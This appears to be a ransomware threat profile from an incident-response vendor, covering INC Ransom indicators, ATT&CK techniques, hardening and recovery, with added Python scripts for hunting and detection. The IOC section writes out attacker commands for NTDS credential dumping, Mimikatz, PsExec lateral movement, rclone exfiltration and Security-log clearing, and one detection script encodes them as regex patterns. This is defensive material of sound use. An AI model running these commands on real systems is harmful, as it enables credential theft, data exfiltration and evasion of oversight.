Double-extortion RaaS · Active since 2023 · Targeted attacks

INC Ransom (Incransom) – ransomware profile, indicators & response guidance

INC Ransom – also known as Incransom – is a double-extortion ransomware operation active since 2023. The group targets organisations worldwide, encrypts data with the .INC extension and threatens to publish stolen information on a Tor-based leak site if the ransom is not paid.

10+ years of experience with ransomware cases · EU-based digital forensics & IR team · INC Ransom, Akira, Qilin, LockBit & more

Figure: INC Ransom leak site on Tor listing victims – example of an INC Ransom leak page (Tor hidden service, victim details anonymised).

Group profile & key facts

First observed: Mid-2023 (Windows & Linux campaigns)
Model: Ransomware-as-a-Service (RaaS), double extortion
Ransom note: INC-README.txt
File extension: Encrypted files typically end in .INC

Target profile

INC Ransom predominantly targets organisations rather than individual home users, across sectors including manufacturing, professional services, education, construction and healthcare. Victims are located worldwide, with a focus on Europe and North America.

Attack strategy

The group typically combines initial access via exposed services or edge devices (for example VPN gateways and firewalls) with credential theft, lateral movement to critical systems, data exfiltration and large-scale encryption – followed by extortion via a Tor-hosted leak site.

Business impact

Disruption often affects core business systems such as file servers, virtualisation platforms, ERP or email. In addition to encryption impact, regulatory exposure and reputational damage from data leaks can be significant – even if backups are available.

File indicators – extensions, notes & artefacts

File extensions & ransom notes

  • Encrypted files: often renamed with the .INC extension.
  • Ransom note: text file named INC-README.txt in directories with encrypted data.
  • Victim ID & contact: the note usually includes a victim-specific code and instructions to access a Tor-based chat portal.

Note: filenames, extensions and wording can change between campaigns. Treat these indicators as examples, not an exhaustive list.

Example artefacts for hunting

  • Newly created INC-README.txt files across file shares and workstation profiles.
  • Unusual spikes of file rename operations followed by rapid file size changes.
  • Presence of suspicious executables or scripts in temporary and profile directories.
  • Staged archives (e.g. .zip, .7z) in unusual locations prior to encryption.
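The artefacts above can be hunted for automatically in file-server or endpoint file-audit telemetry. The following Python script is an added example (not tooling from this page or its authors): it assumes audit events exported as simple "ISO-timestamp host OPERATION path" lines, a constructed format, and flags ransom-note creation per host, bursts of renames to the .INC extension inside a sliding window, and archives created outside an assumed allow-list of known archive locations. The sample events, the window, the threshold and the allow-list are constructed tuning values.

```python
"""Hunt file-activity telemetry for the INC Ransom artefacts listed above.

Added example, not tooling from the page or its authors. It assumes
file-audit events exported as 'ISO-timestamp host OPERATION path' lines
(a simplified, constructed format); the sample data below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RANSOM_NOTE = "inc-readme.txt"          # ransom note name from the profile
ENCRYPTED_EXT = ".inc"                  # extension of encrypted files
STAGING_EXTS = (".zip", ".7z")          # archive types staged before exfiltration
RENAME_WINDOW = timedelta(minutes=5)    # assumption: tuning value
RENAME_THRESHOLD = 20                   # assumption: renames per host per window
ALLOWED_ARCHIVE_PREFIXES = ("\\\\fs01\\backups\\",)  # assumption: known archive location


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    """Parse audit lines into dicts sorted by timestamp."""
    events = []
    for line in lines:
        ts, host, op, path = line.split(" ", 3)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "op": op.upper(), "path": path})
    return sorted(events, key=lambda e: e["ts"])


def ransom_note_hosts(events):
    """Hosts on which the INC ransom note was created."""
    return {e["host"] for e in events
            if e["op"] == "CREATE" and _basename(e["path"]) == RANSOM_NOTE}


def rename_spikes(events, window=RENAME_WINDOW, threshold=RENAME_THRESHOLD):
    """{host: peak count} for hosts whose renames to .INC reach the threshold
    inside any sliding window of length `window`."""
    stamps_by_host = defaultdict(list)
    for e in events:
        if e["op"] == "RENAME" and e["path"].lower().endswith(ENCRYPTED_EXT):
            stamps_by_host[e["host"]].append(e["ts"])
    spikes = {}
    for host, stamps in stamps_by_host.items():
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            spikes[host] = peak
    return spikes


def staged_archives(events):
    """Archives created outside the allow-listed locations."""
    return [e["path"] for e in events
            if e["op"] == "CREATE"
            and e["path"].lower().endswith(STAGING_EXTS)
            and not e["path"].lower().startswith(ALLOWED_ARCHIVE_PREFIXES)]


def hunt(lines):
    events = parse_events(lines)
    return {"ransom_note_hosts": sorted(ransom_note_hosts(events)),
            "rename_spikes": rename_spikes(events),
            "staged_archives": staged_archives(events)}


def constructed_sample():
    """Constructed audit lines: one host mass-renaming to .INC, a ransom note on
    two hosts, one archive staged in a user-writable directory."""
    base = datetime(2024, 1, 15, 2, 0, 0)
    lines = [
        f"{base.isoformat()} FS01 CREATE C:\\Users\\Public\\staging\\finance.7z",
        f"{(base + timedelta(minutes=1)).isoformat()} FS01 CREATE \\\\FS01\\Backups\\weekly.zip",
        f"{(base + timedelta(minutes=3)).isoformat()} WS-HR-02 RENAME C:\\Users\\a.lee\\report.INC",
    ]
    for i in range(25):
        ts = base + timedelta(minutes=10, seconds=3 * i)
        lines.append(f"{ts.isoformat()} WS-FIN-07 RENAME C:\\Data\\file{i}.xlsx.INC")
    lines.append(f"{(base + timedelta(minutes=12)).isoformat()} WS-FIN-07 CREATE C:\\Data\\INC-README.txt")
    lines.append(f"{(base + timedelta(minutes=13)).isoformat()} FS01 CREATE \\\\FS01\\Finance\\INC-README.txt")
    return lines


if __name__ == "__main__":
    print(hunt(constructed_sample()))
```

The single rename on WS-HR-02 stays below the threshold, so a user renaming one file to a .INC-looking name does not page anyone; the 25 renames within 72 seconds on WS-FIN-07 do. The rename threshold and window should be tuned against a baseline of normal file-server activity before deployment.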

Indicators of compromise (IOCs) & tools commonly observed

Public reporting and incident experience show that INC Ransom operators frequently rely on a set of standard administrative and offensive tools during intrusions. These tools are not malicious by themselves, but their combination and context can be highly suspicious.

Examples of commands & utilities seen in campaigns

# Discovery & situational awareness
ipconfig /all
systeminfo
netstat -ano
nltest /dclist:YOURDOMAIN
nltest /domain_trusts

# Credential access & privilege escalation
mimikatz.exe
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit

# Lateral movement & remote execution
PsExec.exe \\HOST cmd.exe
wmic process call create …

# Data staging & exfiltration
rclone.exe copy C:\Shares remote:backup --config C:\temp\rclone.conf
restic backup C:\ImportantData --repo …

# Defence evasion & log tampering
wevtutil cl Security
taskkill /F /IM securitytool.exe

These examples are simplified and focus on detection and hunting. On their own, they do not prove an INC Ransom intrusion, but they should trigger closer investigation if seen together with other suspicious behaviour.
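Because each of these commands is also used legitimately by administrators, a useful detection does not alert on a single match but on the combination of several tactics on one host within a short period. The Python below is an added example, not detection content from this page or its authors: it encodes the command-line patterns listed above as regular expressions tagged with a tactic label, runs them over Sysmon-style process-creation events (a constructed input format of timestamp, host and command line), and escalates a host only when at least two distinct tactics appear inside a two-hour window. The window, the escalation threshold and the sample events are constructed values.

```python
"""Score process-creation telemetry for combinations of the INC Ransom
tooling listed above.

Added example, not detection content from the page or its authors. It assumes
events of the form (timestamp, host, command_line); sample data is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (tactic label, regex over the command line) for the commands in the profile
RULES = [
    ("discovery", re.compile(r"\bnltest(\.exe)?\s+/(dclist|domain_trusts)", re.I)),
    ("discovery", re.compile(r"\bnetstat(\.exe)?\s+-ano\b", re.I)),
    ("credential_access", re.compile(r"\bmimikatz", re.I)),
    ("credential_access", re.compile(r"\bntdsutil.*\bifm\b.*\bcreate full\b", re.I)),
    ("lateral_movement", re.compile(r"\bpsexec(\.exe)?\s+\\\\", re.I)),
    ("lateral_movement", re.compile(r"\bwmic(\.exe)?\s+process\s+call\s+create\b", re.I)),
    ("exfiltration", re.compile(r"\b(rclone|restic)(\.exe)?\s+(copy|sync|backup)\b", re.I)),
    ("defence_evasion", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("defence_evasion", re.compile(r"\btaskkill(\.exe)?\s.*?/IM\s", re.I)),
]
WINDOW = timedelta(hours=2)     # assumption: correlation window
ESCALATE_TACTICS = 2            # assumption: distinct tactics needed to escalate


def match_rules(cmdline):
    """Set of tactic labels whose rule matches the command line."""
    return {tactic for tactic, rx in RULES if rx.search(cmdline)}


def score_hosts(events):
    """events: iterable of (timestamp, host, command_line).

    Returns {host: {"tactics": [...], "hits": [...]}} for every host that shows
    ESCALATE_TACTICS or more distinct tactics inside WINDOW; a host with only
    discovery commands (a normal admin) or only one taskkill is not escalated.
    """
    per_host = defaultdict(list)
    for ts, host, cmd in sorted(events, key=lambda e: e[0]):
        tactics = match_rules(cmd)
        if tactics:
            per_host[host].append((ts, tactics, cmd))
    escalated = {}
    for host, hits in per_host.items():
        for ts_start, _, _ in hits:
            in_window = [h for h in hits if ts_start <= h[0] <= ts_start + WINDOW]
            tactics = set().union(*(h[1] for h in in_window))
            if len(tactics) >= ESCALATE_TACTICS:
                escalated[host] = {"tactics": sorted(tactics),
                                   "hits": [h[2] for h in in_window]}
                break
    return escalated


def constructed_events():
    """Constructed process events: an admin host doing inventory, a workstation
    walking through the whole chain, and an unrelated taskkill elsewhere."""
    base = datetime(2024, 1, 15, 1, 0, 0)
    return [
        (base, "ADMIN-JUMP", "nltest /dclist:YOURDOMAIN"),
        (base + timedelta(minutes=5), "ADMIN-JUMP", "netstat -ano"),
        (base + timedelta(minutes=10), "WS-FIN-07", "nltest /domain_trusts"),
        (base + timedelta(minutes=40), "WS-FIN-07",
         'ntdsutil "activate instance ntds" "ifm" "create full C:\\temp\\ntds" quit quit'),
        (base + timedelta(minutes=55), "WS-FIN-07", "PsExec.exe \\\\FS01 cmd.exe"),
        (base + timedelta(hours=1, minutes=30), "WS-FIN-07",
         "rclone.exe copy C:\\Shares remote:backup --config C:\\temp\\rclone.conf"),
        (base + timedelta(hours=1, minutes=50), "WS-FIN-07", "wevtutil cl Security"),
        (base + timedelta(days=1), "WS-HR-02", "taskkill /F /IM notepad.exe"),
    ]


if __name__ == "__main__":
    for host, detail in score_hosts(constructed_events()).items():
        print(host, detail["tactics"])
```

In a SIEM the same logic maps onto a correlation rule keyed on the host (or on the initiating user) with the same window; the regular expressions are deliberately loose about the `.exe` suffix and case because attackers commonly rename or re-case these binaries.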

Network indicators, leak site & infrastructure

INC Ransom maintains a Tor-based leak site where they list victims who have not met their demands, as well as chat portals used during negotiations. These services are an important part of the double-extortion strategy.

  • Leak site: Tor hidden service URL dedicated to publishing stolen data and victim names.
  • Chat portal: separate Tor-hosted service for negotiation and “support”.
  • Data transfer: exfiltration often uses cloud storage tools or bespoke SFTP/RDP servers.

For detection purposes, we recommend monitoring outbound connections to unfamiliar cloud storage providers, VPS ranges and anonymisation infrastructure, rather than relying on static onion or IP indicators alone.

MITRE ATT&CK mapping – example techniques used by INC Ransom

The following mapping is a summarised view based on public threat intelligence and typical double-extortion playbooks. Individual incidents may deviate.

  • Initial Access: T1078 Valid Accounts (VPN, RDP), T1133 External Remote Services, exploitation of vulnerable edge devices.
  • Execution: T1059 Command and Scripting Interpreter (PowerShell, CMD, Bash).
  • Persistence: T1547 Boot or Logon Autostart Execution (services, run keys, scheduled tasks).
  • Privilege Escalation: T1068 Exploitation for Privilege Escalation.
  • Defense Evasion: T1562 Impair Defenses (AV/EDR tampering, log clearing), T1070 Indicator Removal.
  • Credential Access: T1003 OS Credential Dumping (NTDS, LSASS, SAM using tools such as Mimikatz).
  • Discovery: T1087 Account Discovery, T1018 Remote System Discovery, T1049 System Network Connections Discovery.
  • Lateral Movement: T1021 Remote Services (RDP, SMB, WinRM), T1021.002 SMB/Windows Admin Shares.
  • Collection: T1119 Automated Collection across file shares and application servers.
  • Exfiltration: T1041 Exfiltration Over C2 Channel (e.g. via cloud storage tools).
  • Impact: T1486 Data Encrypted for Impact, T1490 Inhibit System Recovery (shadow copy deletion, backup removal).

How to detect and reduce the risk of an INC Ransom intrusion

Detection & telemetry focus areas

  • Authentication anomalies: repeated failed logins, legacy VPN usage without MFA, logins from unusual locations or autonomous systems.
  • Endpoint behaviour: suspicious tools launched from temporary directories, encryption-like file access patterns, rapid service stoppage.
  • Backup infrastructure: unexpected deletion of snapshots, backup jobs disabled or modified by non-backup accounts.
  • Network traffic: new outbound connections to unknown cloud storage providers or VPS infrastructure, especially preceding encryption.
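The authentication items above translate directly into checks over VPN or identity-provider logs. The Python below is an added example, not content from this page or its authors: it assumes a simplified, constructed log format of "timestamp user RESULT mfa=<yes|no> src_asn=<ASN>" and a per-user baseline of previously seen autonomous systems, and reports bursts of failed logins per account, successful logins without MFA, and successful logins from an ASN not in the account's baseline. The sample log, the baseline, the window and the threshold are constructed values (the ASNs are from the range reserved for documentation).

```python
"""Flag the authentication anomalies listed above in VPN / identity logs.

Added example, not content from the page or its authors. It assumes log
lines of the form 'timestamp user RESULT mfa=<yes|no> src_asn=<ASN>'
(a simplified, constructed format) and a per-user baseline of known ASNs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_WINDOW = timedelta(minutes=10)   # assumption: tuning value
FAIL_THRESHOLD = 5                    # assumption: failed logins per window


def parse_auth_lines(lines):
    """Parse constructed auth lines into dicts sorted by timestamp."""
    events = []
    for line in lines:
        ts, user, result, mfa, asn = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "result": result.upper(),
                       "mfa": mfa.split("=", 1)[1] == "yes",
                       "asn": asn.split("=", 1)[1]})
    return sorted(events, key=lambda e: e["ts"])


def auth_anomalies(lines, baseline_asns):
    """baseline_asns: {user: set of ASNs seen during a learning period}.

    Returns three lists: accounts with FAIL_THRESHOLD failures inside
    FAIL_WINDOW, (user, asn) pairs that logged in without MFA, and
    (user, asn) pairs that logged in from an ASN outside their baseline.
    """
    findings = {"failed_bursts": [], "no_mfa_logins": [], "new_asn_logins": []}
    recent_fails = defaultdict(list)
    for e in parse_auth_lines(lines):
        if e["result"] == "FAIL":
            window = recent_fails[e["user"]]
            window.append(e["ts"])
            while e["ts"] - window[0] > FAIL_WINDOW:   # drop stale failures
                window.pop(0)
            if len(window) == FAIL_THRESHOLD:          # report once per crossing
                findings["failed_bursts"].append(e["user"])
        elif e["result"] == "SUCCESS":
            if not e["mfa"]:
                findings["no_mfa_logins"].append((e["user"], e["asn"]))
            if e["asn"] not in baseline_asns.get(e["user"], set()):
                findings["new_asn_logins"].append((e["user"], e["asn"]))
    return findings


# Constructed baseline: ASNs each account was seen from in a quiet period.
BASELINE_ASNS = {"j.doe": {"AS64496"}, "svc-vpn": {"AS64496"}}


def constructed_auth_log():
    """Constructed log: a service account brute-forced and then logged in
    without MFA from a new ASN; a normal user with one stray failure."""
    base = datetime(2024, 1, 15, 1, 0, 0)
    lines = [f"{(base + timedelta(minutes=i)).isoformat()} svc-vpn FAIL mfa=no src_asn=AS64500"
             for i in range(5)]
    lines.append(f"{(base + timedelta(minutes=6)).isoformat()} svc-vpn SUCCESS mfa=no src_asn=AS64500")
    lines.append(f"{(base + timedelta(minutes=8)).isoformat()} j.doe SUCCESS mfa=yes src_asn=AS64496")
    lines.append(f"{(base + timedelta(minutes=9)).isoformat()} j.doe FAIL mfa=yes src_asn=AS64496")
    return lines


if __name__ == "__main__":
    print(auth_anomalies(constructed_auth_log(), BASELINE_ASNS))
```

The three findings for svc-vpn are individually weak but together match the pattern the profile describes for initial access via valid accounts on exposed remote services; in practice the ASN baseline would be learned from several weeks of successful logins rather than hard-coded.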

Hardening & basic protections

  • Enforce MFA on all external remote access (VPN, RDP gateways, cloud admin consoles).
  • Reduce and monitor publicly exposed services – especially legacy VPNs, RDP and web management interfaces.
  • Implement network segmentation for backups, domain controllers and critical OT/ICS systems.
  • Maintain tested offline or immutable backups and ensure restore procedures are documented and exercised.

Decryption & data recovery options for INC Ransom

Are INC Ransom encrypted files recoverable without paying?

At the time of writing, there is no publicly available universal decryptor for current INC Ransom variants. For some early or specific builds, security researchers and incident response teams have reported successful decryption in isolated cases – but these methods are not generally applicable to all victims.

In practice, recovery options typically focus on:

  • Restoring from clean, offline or immutable backups that were not compromised or encrypted.
  • Recovering from snapshots, replicas or archived copies in storage systems and cloud services.
  • Targeted file-level recovery where partial data remains intact or shadow copies survived.

Important: Do not delete encrypted data. Even if immediate decryption is not possible, future tooling or keys might become available for specific variants. Preserving encrypted files, logs and forensic artefacts is essential for any later recovery attempt and legal or insurance processes.

Further threat intelligence & external analyses

For an up-to-date picture of INC Ransom activity, we recommend correlating multiple threat-intelligence sources (vendor blogs, CERT advisories, open-source feeds) with your own telemetry.

  • Threat-intel articles from security vendors describing INC Ransom TTPs and infrastructure.
  • Community and academic analyses of Windows and Linux INC payloads.
  • Government / CERT advisories where INC Ransom is mentioned as an active threat actor.

Our DFIR team continuously tracks changes in INC Ransom tooling, infrastructure and negotiation practices and incorporates those into hunting queries, detection content and hardening guidance.

Related ransomware groups

Many organisations facing INC Ransom also need to assess exposure to other active double-extortion operations. We provide dedicated briefings and response services for, among others: